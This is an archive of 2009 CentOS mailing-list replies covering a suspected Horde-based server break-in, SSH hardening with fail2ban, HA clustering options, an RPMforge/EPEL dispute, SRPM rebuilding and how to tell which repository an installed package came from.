> max compression)  /dev/.udev (directory)
> >
> > Should i delete these files? are the man files nromally .gz or .bz2 ?
> >
> > There is also a similar entry, where another file called unix2.tgz was 
> downloaded
> >
> > But i cant find these files on the HDisk?
> > guys i am out of my league here. All assistance is deeply appreciated.
> >  
> 
> I *hope* this machine is disconnected from the internet and running a 
> liveCD to investigate this

yes. but i havent formatted it yet bcos i need to understand what happened... i 
still cant believe a centos box that was regularly updated , patched was hacked
 
> yes, it appears you've been hacked, and have stealth files (any file 
> with . in front oft he name is hidden and would only show with ls -a and 
> if you  *are* rootkitted, there's a strong possibility your ls and other 
> command tools have been replaced..

i dont think the attacker got root ownership or else the log files would have 
been altered or deleted.

> and, it appears it came in via an exploit in that horde framework (I 
> know nothing about horde)
> 

hopefully more members on the list will weigh in on this.



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

2009-06-16 Thread Linux Advocate




> cmdshell.php)
> > ? The horde framework was  installed from the centos repo.!!!
> > 
> I don't think the horde set on CentOS is very current. I just used the tarball
> from the horde website, and I keep it current.

ok. its just that with centos being a redhat clone and so on. all the rpms they 
use are suppose to hv been 'vetted' right but anywat... its a lesson learnt.



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....[SOLVED]

2009-06-18 Thread Linux Advocate

thanx guys. Lets close this thread. bye. 



- Original Message 
> From: Scott Silva 
> To: centos@centos.org
> Sent: Thursday, June 18, 2009 2:36:27 AM
> Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell
> 
> on 6-16-2009 10:26 PM Linux Advocate spake the following:
> > 
> > 
> > 
> >> cmdshell.php)
> >>> ? The horde framework was  installed from the centos repo.!!!
> >>>
> >> I don't think the horde set on CentOS is very current. I just used the 
> tarball
> >> from the horde website, and I keep it current.
> > 
> > ok. its just that with centos being a redhat clone and so on. all the rpms 
> they use are suppose to hv been 'vetted' right but anywat... its a lesson 
> learnt.
> 
> I think the horde stuff is in extras or plus, and not maintained AFAIK.



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] ssh security

2009-06-19 Thread Linux Advocate


> > [Normal log stuff from dictionary attack deleted...]
> 
> This is common, and, presuming you have good passwords or only
> accept authorized_keys, not a real problem other than large log
> files.
> 
> Look at fail2ban for a method that will automatically add
> iptables blocks when this occurs.
> 

yes fail2ban is very useful. but also good to change to a non standard port.



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Program to ban sniffers

2009-06-20 Thread Linux Advocate






> 
> That program would then, upon receiving a 'sniff' or 'user' would then add
> that ip to the deny hosts lists..for either a long or short time.
> 
> Using this would seem like a win as you can easily grab someone before they
> can get somewhere one hopes.
> Also, by opening up a few other ports that are unusual like 8561well, if
> someone sniffs that it could be a 3 day ban or a month...
> 
> In other words, anyone hitting those ports that are not being used at all
> except by our sniff protector, would allow instant banning.
> 
> So...does something like this exist?

fail2ban... near enough a fit...



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] server is always getting hacked

2009-06-28 Thread Linux Advocate

get ;

1. fail2ban - it blocks failed login ips etc
2. get shorewall or any iptables front end and restrict ips to the ranges u 
need ( or even specific ips)
3. run ssh on a nonstandard port
4. good, long  password

these steps will go a long way and will get u started.



- Original Message 
> From: Mag Gam 
> To: CentOS mailing list 
> Sent: Sunday, June 28, 2009 3:21:25 AM
> Subject: [CentOS] server is always getting hacked
> 
> WE have a centos 5.3 install, and our server is keep getting hacked.
> We see load averages of 500+ and see people from all over the world
> logging into our server (used last).
> 
> Is there a good place to start to avoid these kinds of things?
> 
> For example, here is what I already did.
> 
> Open up sshd port only
> setup iptables to only accept port 80 and 22
> No FTP
> No other ports are allowed according to IP Tables.
> 
> 
> I am not sure what else measures I can take. Can someone please assist?
> 
> TIA
> ___
> CentOS mailing list
> CentOS@centos.org
> http://lists.centos.org/mailman/listinfo/centos



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] 2 servers cluster

2009-06-28 Thread Linux Advocate
taling abt piranha... i understand that its LVS + webfrontend and is suitable 
fro webpages and so on. What do we need to make it as a LAMP cluster, i.e with 
a mysql HA backend as well.

So-> HA of [ LoadBalancer + Apache + MySQL}

Any ideas guys?





From: fmb fmb 
To: CentOS mailing list 
Sent: Saturday, June 27, 2009 11:14:33 PM
Subject: Re: [CentOS] 2 servers cluster

Thnx Brian. This is the first thing that I will do...


On Sat, Jun 27, 2009 at 5:29 PM, Brian Mathis  wrote:

CentOS has the redhat piranha packages available for install.  Piranha
is a repackaging of the linux virtual server software, along with a
web-based front-end.  You can find information about that in the
CentOS docs and also by googling for "redhat piranha".



On Fri, Jun 26, 2009 at 11:57 PM, fmb fmb wrote:
> Hi,
>
> I am thinking of setting up two servers in load balance mode. I would really
> appreciate your suggestions and hints...
>
>
> thnx,
>

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


  ___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] 2 servers cluster

2009-06-28 Thread Linux Advocate
thanx bro. yes i have been looking as well. have looked at drbd...





From: Neil Aggarwal 
To: CentOS mailing list 
Sent: Monday, June 29, 2009 12:32:46 PM
Subject: Re: [CentOS] 2 servers cluster

 
We tried Sequioa:
http://www.continuent.com/community/lab-projects/sequoia
 
We wanted automatic failover and geographical 
distribution
of the database nodes.  Sequoia only supports 
master-master
operation if the database nodes are on the same 
subnet.
 
We did not find anything else out there, so we wrote 
our
own geographically distributed database system.
We can adapt that to your project if you are 
interested.
 
Neil

--
Neil Aggarwal, (281)846-8957, www.JAMMConsulting.com
Your e-commerce site can be geographically redundant 
and available
even if failure occurs. Ask me about the GRed database 
system. 
 



 From: centos-boun...@centos.org  [mailto:centos-boun...@centos.org] On Behalf 
Of Linux  Advocate
Sent: Sunday, June 28, 2009 11:18 PM
To: CentOS  mailing list
Subject: Re: [CentOS] 2 servers  cluster


taling abt piranha... i understand that its LVS + webfrontend and is  suitable 
fro webpages and so on. What do we need to make it as a LAMP cluster,  i.e with 
a mysql HA backend as well.

So-> HA of [ LoadBalancer +  Apache + MySQL}

Any ideas guys?





 From: fmb fmb  
To: CentOS mailing list  
Sent: Saturday, June 27, 2009 11:14:33  PM
Subject: Re: [CentOS] 2  servers cluster

Thnx Brian. This is the first thing that I will  do...


On Sat, Jun 27, 2009 at 5:29 PM, Brian Mathis  wrote:

CentOS has the redhat piranha packages available for  install.  Piranha
is a repackaging of the linux virtual server  software, along with a
web-based front-end.  You can find  information about that in the
CentOS docs and also by googling for  "redhat piranha".



On Fri, Jun 26, 2009 at 11:57 PM, fmb fmb  wrote:
> Hi,
>
> I am thinking of setting up two servers  in load balance mode. I would really
> appreciate your suggestions and  hints...
>
>
> thnx,
>

___
CentOS  mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


  ___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] 2 servers cluster

2009-06-29 Thread Linux Advocate
thanx. i missed that


>
>From: Neil Aggarwal 
>To: CentOS mailing list 
>Sent: Monday, June 29, 2009 10:36:37 PM
>Subject: Re: [CentOS] 2 servers cluster
>
> >
>
>You will still 
>be limited to a single primary server with DRBD.
>Here is a line from 
>their site:
>DRBD's primary-primary 
>mode with a shared disk file system (GFS, OCFS2). These systems are very 
>sensitive to failures of the replication network. Currently we cannot 
>generally 
>recommend this for production use.
>
>--
>Neil Aggarwal, (281)846-8957, 
>www.JAMMConsulting.com
>100% uptime for your e-commerce site! Stay fully 
>operational
>even with a db server failure.  Ask me about the GRed 
>database. 
> 
>
>
____
 From: centos-boun...@centos.org 
>>  [mailto:centos-boun...@centos.org] On Behalf Of Linux 
>>  Advocate
>>Sent: Monday, June 29, 2009 12:13 AM
>>To: CentOS 
>>  mailing list
>>Subject: Re: [CentOS] 2 servers 
>>  cluster
>>
>>
>>thanx bro. yes i have been looking as well. have looked at 
>>  drbd...
>>
>>
>>
>>

 From: Neil Aggarwal 
>>  
>>To: CentOS mailing list 
>>  
>>Sent: Monday, June 29, 2009 12:32:46 
>>  PM
>>Subject: Re: [CentOS] 2 
>>  servers cluster
>>
>> >> 
>>We tried Sequioa:
>>http://www.continuent.com/community/lab-projects/sequoia
>> 
>>We wanted automatic failover and geographical 
>>  distribution
>>of the database nodes.  Sequoia only supports 
>>  master-master
>>operation if the database nodes are on the same 
>>  subnet.
>> 
>>We did not find anything else out there, so we wrote 
>>  our
>>own geographically distributed database system.
>>We can adapt that to your project if you are 
>>  interested.
>> 
>>
>> Neil
>>
>>--
>>Neil Aggarwal, (281)846-8957, www.JAMMConsulting.com
>>Your e-commerce site can be 
>>  geographically redundant and available
>>even if failure occurs. Ask me about 
>>  the GRed database system. 
>> 
>>
>>

 From: centos-boun...@centos.org 
>>>[mailto:centos-boun...@centos.org] On Behalf Of Linux 
>>>Advocate
>>>Sent: Sunday, June 28, 2009 11:18 PM
>>>To: CentOS 
>>>mailing list
>>>Subject: Re: [CentOS] 2 servers 
>>>cluster
>>>
>>>
>>>taling abt piranha... i understand that its LVS + webfrontend and is 
>>>suitable fro webpages and so on. What do we need to make it as a LAMP 
>>>cluster, i.e with a mysql HA backend as well.
>>>
>>>So-> HA of [ 
>>>LoadBalancer + Apache + MySQL}
>>>
>>>Any ideas guys?
>>>
>>>
>>>
>>>

 From: fmb fmb 
>>>
>>>To: CentOS mailing list 
>>>
>>>Sent: Saturday, June 27, 2009 11:14:33 
>>>PM
>>>Subject: Re: [CentOS] 2 
>>>servers cluster
>>>
>>>Thnx Brian. This is the first thing that I 
>>>will do...
>>>
>>>
>>>On Sat, Jun 27, 2009 at 5:29 PM, Brian Mathis  >>>   
>>> wrote:
>>>
>>>CentOS has the redhat piranha packages available for 
>>>>  install.  Piranha
>>>>is a repackaging of the linux virtual server 
>>>>  software, along with a
>>>>web-based front-end.  You can find 
>>>>  information about that in the
>>>>CentOS docs and also by googling for 
>>>>  "redhat piranha".
>>>>
>>>>
>>>>
>>>>On Fri, Jun 26, 2009 at 11:57 PM, fmb fmb 
>>>>  wrote:
>>>>> Hi,
>>>>>
>>>>> I am thinking of setting up two servers 
>>>>  in load balance mode. I would really
>>>>> appreciate your suggestions 
>>>>  and hints...
>>>>>
>>>>>
>>>>> thnx,
>>>>>
>>>>
>>>>___
>>>>CentOS 
>>>>  mailing list
>>>>CentOS@centos.org
>>>>http://lists.centos.org/mailman/listinfo/centos
>>>>
>>>
>>>
>>


  ___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Dag's comment at linuxtag

2009-06-29 Thread Linux Advocate

same here. i really must thank dag wiers and gang for all the good work. But If 
epel and rpmforge can work together , that's great.



- Original Message 
> From: Ron Loftin 
> To: CentOS mailing list 
> Sent: Tuesday, June 30, 2009 3:13:33 AM
> Subject: Re: [CentOS] Dag's comment at linuxtag
> 
> 
> While I don't want to just add noise to this thread, I think that there
> might be some miscommunication and/or misunderstanding involved here.  I
> also want to express my appreciation to Dag and the folks who maintain
> the RPMforge repo, as I find it quite useful.
> 
> On Mon, 2009-06-29 at 20:34 +0200, Dag Wieers wrote:
> > On Mon, 29 Jun 2009, Radu-Cristian FOTESCU wrote:
> > 
> > >
> > >> A quick look at http://distrowatch.com/table.php?distribution=centos
> > >> shows that a great majority of the packages are not even
> > >> close to being "up-to-date", and that is a good thing for
> > >> those us of who care more about stability than eyecandy.
> > >
> > > That can't be other way. For instance, you can't build GIMP 2.4 or 2.6
> > > unless you you upgrade to a newer GTK+, which would impact on a lot of
> > > apps.
> > >
> 
> The impression I get from the above exchange is that someone either has
> not read the CentOS mission statement, or does not understand it in the
> context of "enterprise" and "stable" distribution.  This leads to
> dissatisfaction with their installations, since one of the costs of
> long-term stability is loss of the capability to upgrade package
> versions in a piecemeal manner.
> 
> > > OTOH, Dag is in a funny position: he's the main maintainer of RPMforge,
> > > which has 2 main issues:
> > > (1) It's broken, at least partially. Try install audacious for one.
> > > (2) It's incompatible with EPEL. Try install MPlayer and VLC with EPEL
> > > enabled.
> 
> These observations, while technically correct, show a lack of
> familiarity with the long-running differences of opinion between the
> RPMforge folks and the EPEL crew.  Again, in the technical/factual
> universe, I support Dag's response below, but in the political/emotional
> world, I hope that this is not indicating a bump up against the limits
> of his patience with these conflicting viewpoints.
> 
> > 
> >   (1) I expect now patches from you to make a workable audacious based on
> >   our audacious package. Apparently you have the interest and the time
> >   to do it ?
> > 
> >   (2) No, they are not compatible, we know. Share to help with this too ?
> >   You first have to convince the Fedora people that they will not
> >   introduce new incompatibilities before starting. I'd right merge, but
> >   also that is not happening as there is no interest. So what is the
> >   solution ? Shall I simply stop doing RPMforge ?
> 
> Here I will speak for myself, while hoping that there are others who
> will agree:
> 
> HELL NO !!!
> 
> I'm not enough of a programmer to even THINK of replacing the talent you
> bring to the table, and I suspect that there are relatively few people
> who DO posses those skills who would also have the dedication you do.  I
> will say it if nobody else will:  The distros supported by RPMforge
> would be poorer without your efforts.
> 
> > 
> > Is that the position you prefer to force me into ? Because I certainly did 
> > not force you into using the repository.
> 
> On the lighter side:  If you HAD forced anyone to use the repository, I
> suspect that you would have forced them to read the relevant docs
> ( HOWTOs, etc. ) FIRST. ;>
> 
> > 
> > I don't know even why you want to use RPMforge, there must be something 
> > that is missing from EPEL ?
> > 
> > I am happy to learn what you want to do though, because it is easy to 
> > criticize, but it takes time to do some work.
> > 
> > (And I hope the solution is not another repository, because we have been 
> > there :-))
> > 
> -- 
> Ron Loftin  relof...@twcny.rr.com
> 
> "God, root, what is difference ?"   Piter from UserFriendly
> 
> ___
> CentOS mailing list
> CentOS@centos.org
> http://lists.centos.org/mailman/listinfo/centos



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Dag's comment at linuxtag

2009-06-29 Thread Linux Advocate

beranger...@yahoo.com...  , u have a problem with dag...and now it looks like u 
have a problem with linus torvalds himself u talk abt the need for 
cooperation,etc but you apparently dont get that 'you have to give respect 
to get respect' & 'give cooperation to get cooperation'

relax bro.



- Original Message 
> From: Radu-Cristian FOTESCU 
> To: CentOS mailing list 
> Sent: Tuesday, June 30, 2009 9:51:54 AM
> Subject: Re: [CentOS] Dag's comment at linuxtag
> 
> 
> > led to the great compiler we have today.  The same
> > would hold for any large project (the kernel, firefox, etc.)
> 
> And... are you happy with the quality of the huge $h1t which
> is Firefox? Because I am not.
> 
> As for the Linux kernel, they pushed in all kind of crap. 
> Back in 1996, I was running Linux with X in only 8 Megs of RAM!
> Now, I doubt I could even boot with such a memory...
> 
> Linux is not like Jesus. Linux is not "good", nor "great".
> It's only "much less worse" than Windows, and marginally
> better than the BSDs. 
> Of course, it's open source and so on. But it's a huge crap
> like everything that's software nowadays.
> 
> 
> > I fail to see why tens of micro repos are easier
> > to maintain consistent than a large one. 
> 
> They're not. But at least you don't have to make people
> get along. 
> 
> 
> > > 7,600 packages is really too much for a couple of
> > people to
> > > maintain. Unless it's scaled *down*...
> > 
> > ...or scale the maintainers up.
> 
> Still, 7,600 is unmaintainable. For their ~20k packages,
> both Debian and Ubuntu use dozens and dozens of packages.
> (And I won't mention the quality of Ubuntu's packages.)
> As for TUV, they decided they can only support ~2.5k packages,
> regardless of the fact that they're the #1 Linux company.
> 
> I maintain that RF is way too large to be properly maintainable.
> 


  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Dag's comment at linuxtag

2009-06-30 Thread Linux Advocate

Niki, could u tell me howto build frm SRPM? i am not good at this area and 
would like to learn this.



- Original Message 
> From: Niki Kovacs 
> To: CentOS mailing list 
> Sent: Tuesday, June 30, 2009 5:11:54 PM
> Subject: Re: [CentOS] Dag's comment at linuxtag
> 
> David Hrbác a écrit :
> 
> > 
> > Niki,
> > that's starting the flame. Compare to PLD linux... more than 1
> > RPMs... 
> 
> Well, no flame intended. So let me just add this. I'm a happy RPMForge 
> repo user. No other third-party repos. I've learned how to circumvent 
> the odd quirks in the repo (like: how do I use VLC and Audacity at the 
> same time). And if a package is not in RPMForge (which happens, but 
> rarely), well, I grab the SRPM and build it myself. I also have a small 
> repo, but only for private use, so replication is easy.
> 
> So let's get this straight: huge pat on the shoulder for Dag. Thanks for 
> your great repo !
> 
> Niki
> ___
> CentOS mailing list
> CentOS@centos.org
> http://lists.centos.org/mailman/listinfo/centos



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Dag's comment at linuxtag

2009-06-30 Thread Linux Advocate

david, could u tell me how to build frm SRPMS. i m not good in this area and 
would like to improve.



- Original Message 
> From: David Hrbác( 
> To: CentOS mailing list 
> Sent: Tuesday, June 30, 2009 5:52:37 PM
> Subject: Re: [CentOS] Dag's comment at linuxtag
> 
> Niki Kovacs napsal(a):
> > Well, no flame intended. So let me just add this. I'm a happy RPMForge 
> > repo user. No other third-party repos. I've learned how to circumvent 
> > the odd quirks in the repo (like: how do I use VLC and Audacity at the 
> > same time). And if a package is not in RPMForge (which happens, but 
> > rarely), well, I grab the SRPM and build it myself. I also have a small 
> > repo, but only for private use, so replication is easy.
> 
> 
> Niki, I'm at the very same point. Only rpmforge and my repos user.
> David
> ___
> CentOS mailing list
> CentOS@centos.org
> http://lists.centos.org/mailman/listinfo/centos



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Dag's comment at linuxtag

2009-06-30 Thread Linux Advocate


> 
> Rather than dumping *even more work* on the core CentOS project (who are 
> already clearly struggling to provide even the core distro at present), 
> why doesn't everyone do as Dag suggested, and adopt a handful of 
> packages and help maintain them at rpmforge for the benefit of everyone.
> 
> If everyone who has offered help in this thread, or commented that they 
> maintain their own repos, offered to maintain a handful of packages at 
> rpmforge then it all adds up.

good idea.



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Dag's comment at linuxtag

2009-06-30 Thread Linux Advocate

great. thanx.



- Original Message 
> From: Robert Heller 
>could u tell me howto build frm SRPM? i am not good at this area and 
> would like to learn this.
> 
> Simple form (should work with most packages):
> 
> # rpmbuild --rebuild package-version-release.srpm
> 
> 'man rpmbuild' for more details.
> 
> This assumes that the spec file does not need tinkering with.  Generally
> you don't need to mess with the spec file if the SRPM is/was built for
> your distro.
> 


  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Dag's comment at linuxtag

2009-06-30 Thread Linux Advocate




> 
> On Tue, Jun 30, 2009 at 14:18, Linux Advocatewrote:
> > could u tell me howto build frm SRPM? i am not good at this area and would 
> like to learn this.
> 
> This article in the Wiki should get you going...
> http://wiki.centos.org/HowTos/RebuildSRPM
> 
> HTH,
> Filipe

thanx.



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Dag's comment at linuxtag

2009-06-30 Thread Linux Advocate

can dag & karanbir sort of sum up this thread as to how list members can  work 
together on improving all the additional non-redhat-originated packages from 
rpmforge,etc. 

As for radu-cristian, relax bro. As for others (myself included), lets all 
chill out. this thread should not

evolve into personal attacks. venting happens once awhile. so lets all work 
together to keep making centos a good cholce for users.




- Original Message 
> From: Les Mikesell 
> To: CentOS mailing list 
> Sent: Wednesday, July 1, 2009 8:42:02 AM
> Subject: Re: [CentOS] Dag's comment at linuxtag
> 
> Radu-Cristian FOTESCU wrote:
> 
> > 
> > RPMRepo is the best proof that collaboration is close to impossible.
> 
> Collaboration isn't exactly the point - in fact the differences are a good 
> thing.  There are legitimate reasons (besides the obvious differences of 
> opinions) for incompatibly different versions of things to exist and to be 
> wanted on different machines.  The problem is not so much that these 
> differences 
> 
> exist, but that the potential users (A) don't have a good way to know what 
> the 
> differences are and why they might want one version over another, and (B) the 
> distro tools are not good at all at maintaining updates from a bunch of 
> different repositories.
> 
> > And ElRepo is the best proof that other small repos could arise, and
> > they have a reason to exist.
> > 
> > But all this is on the "expenses" (not pecuniary, but *nervous*) of
> > the end user, who will get confused and who might also experience
> > system breakage. (No, priorities don't fix everything that easily.)
> 


  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Dag's comment at linuxtag

2009-07-03 Thread Linux Advocate




> 
> enough is enough already.
> 
> can some centos admin please discipline, ban and/or get rid of Radu-Cristian
> FOTESCU aka beranger...@yahoo.ca
> 
> please?
> 
> not only has he physically threatened a contributor, his language & behavior
> are more than inappropriate for such a professional atmosphere that has been
> developed and become a long term testimony at centos.org


i support this motion. i think karanbir or whoever is the admin should step in.



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


[CentOS] Yum - which repo did a package come from

2009-08-03 Thread Linux Advocate
guys,

i have installed mailscanner, spamassassin, etc on my machine. This was done 
sometime ago. Some of these rpms i got not frm centos repos.

What command ( or yum command )  can i  use to find out which repo did this 
installled package come from.

yum info packagename just says; 

repo : installed

i was hoping for something like repo:rpmforge or   something similiar. i have 
these 3 rpms which i cant remember where i got them from.


dovecot-1.0.7-7.el5 
mailscanner-4.74.13-2  
spamassassin-3.2.5-1.el5

Regards,
Marco.


  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Yum - which repo did a package come from

2009-08-04 Thread Linux Advocate
Frank,


> On Mon, 03 Aug 2009 23:33:52 -0700 (PDT)
> Linux Advocate wrote:
> 
> > What command ( or yum command )  can i  use to find out which repo did this 
> installled package come from.
> 
> rpm -qi packagename
> 
>

# rpm -qi spamassassin

Name: spamassassin Relocations: /usr
Version : 3.2.5 Vendor: CentOS
Release : 1.el5 Build Date: Wed 21 Jan 2009 
02:35:38 PM MYT
Install Date: Tue 02 Jun 2009 12:28:52 AM MYT  Build Host: 
builder16.centos.org
Group   : Applications/Internet Source RPM: 
spamassassin-3.2.5-1.el5.src.rpm
Size: 2753255  License: ASL 2.0
Signature   : DSA/SHA1, Mon 09 Mar 2009 09:49:14 AM MYT, Key ID a8a447dce8562897
URL : http://spamassassin.apache.org/
Summary : Spam filter for email which can be invoked from mail delivery 
agents.
Description :
SpamAssassin provides you with a way to reduce if not completely eliminate
Unsolicited Commercial Email (SPAM) from your incoming email.


frm the vendor line, i can see centos...so this rpm was frm the official centos 
repos?



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Yum - which repo did a package come from

2009-08-04 Thread Linux Advocate




> 
> > What command ( or yum command )  can i  use to find out which repo did this 
> installled package come from.
> 
> rpm -qi packagename

# rpm -qi mailscanner

Name: mailscanner  Relocations: (not relocatable)
Version : 4.74.13   Vendor: Electronics and 
Computer Science, University of Southampton
Release : 2 Build Date: Mon 05 Jan 2009 
03:44:33 AM MYT
Install Date: Sat 28 Feb 2009 05:54:11 PM MYT  Build Host: 
alegria.ecs.soton.ac.uk
Group   : System Environment/DaemonsSource RPM: 
mailscanner-4.74.13-2.src.rpm
Size: 2892864  License: GPL
Signature   : DSA/SHA1, Tue 06 Jan 2009 05:32:59 AM MYT, Key ID f21f6e07e67c046c
Packager: Julian Field 
URL : http://www.mailscanner.info/
Summary : E-Mail Gateway Virus Scanner and Spam Detector
Description :
MailScanner is a freely distributable E-Mail gateway virus scanner and
spam detector. It uses Postfix, sendmail, ZMailer, Qmail or Exim as its basis,
and a choice of 22 commercial virus scanning engines to do the actual
virus scanning. 

But i know that i got the mailscanner rpm from the vanderkooij repo... but the 
vendor line shows julian fields employer?



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


[CentOS] RPMs for vispan , spamstat, phplistadmin

2009-08-04 Thread Linux Advocate
Guys,

i have heard of vispan, phplistadmin, spamstat from the mailscanner manual and 
would like to experiment with them. 

1. Any thoughts on them? ( i am trying to avoid mailwatch bcos i think vispan 
is better fit for reporting)
2. I have googled for their centos rpms but no luck? Any ideas where i can get 
their rpms?

regards,
marco.



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Yum - which repo did a package come from

2009-08-04 Thread Linux Advocate



> 
> Yes, I have found this is a limitation of yum. It would be nice if the
> information about the source repository could be stored somewhere.
> 
> If these were installed after the initial OS installation, and you haven't
> done a yum clean, you might be able to glean some info from the cache:
> # ls -l /var/cache/yum/*/packages
> 
> This won't give you any information about packages installed using rpm
> directly instead of yum.
> 

tony, i did yum clean when i upgraded to 5.3



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] firewall question

2009-08-06 Thread Linux Advocate




- Original Message 
> From: William L. Maltby 
> To: CentOS mailing list 
> Sent: Tuesday, August 4, 2009 4:15:40 PM
> Subject: Re: [CentOS] firewall question
> 
> On Mon, 2009-08-03 at 17:39 -0500, Lanny Marcus wrote:
> > 
> 
> > Or IPcop?
> > 
> > 
> > BTW, Scott and other IPCop users, there is a new version of IPCop
> > coming out. It's in testing now:
> 
> That's good to hear. I was afraid the project was dead. It had been so
> long since a release.
> 

if ipcop goes down, there is always shorewall.



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] RPMs for vispan , spamstat, phplistadmin

2009-08-08 Thread Linux Advocate



> Guys,
> 
> i have heard of vispan, phplistadmin, spamstat from the mailscanner manual 
> and 
> would like to experiment with them. 
> 
> 1. Any thoughts on them? ( i am trying to avoid mailwatch bcos i think vispan 
> is 
> better fit for reporting)
> 2. I have googled for their centos rpms but no luck? Any ideas where i can 
> get 
> their rpms?


hv downloaded phplistadmin and tried from source...its pretty messed up...i 
dont even think it works.

any thought on vispan? spamstat? i hv tried looking in rpmforge

regards,
marco.



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


  1   2   >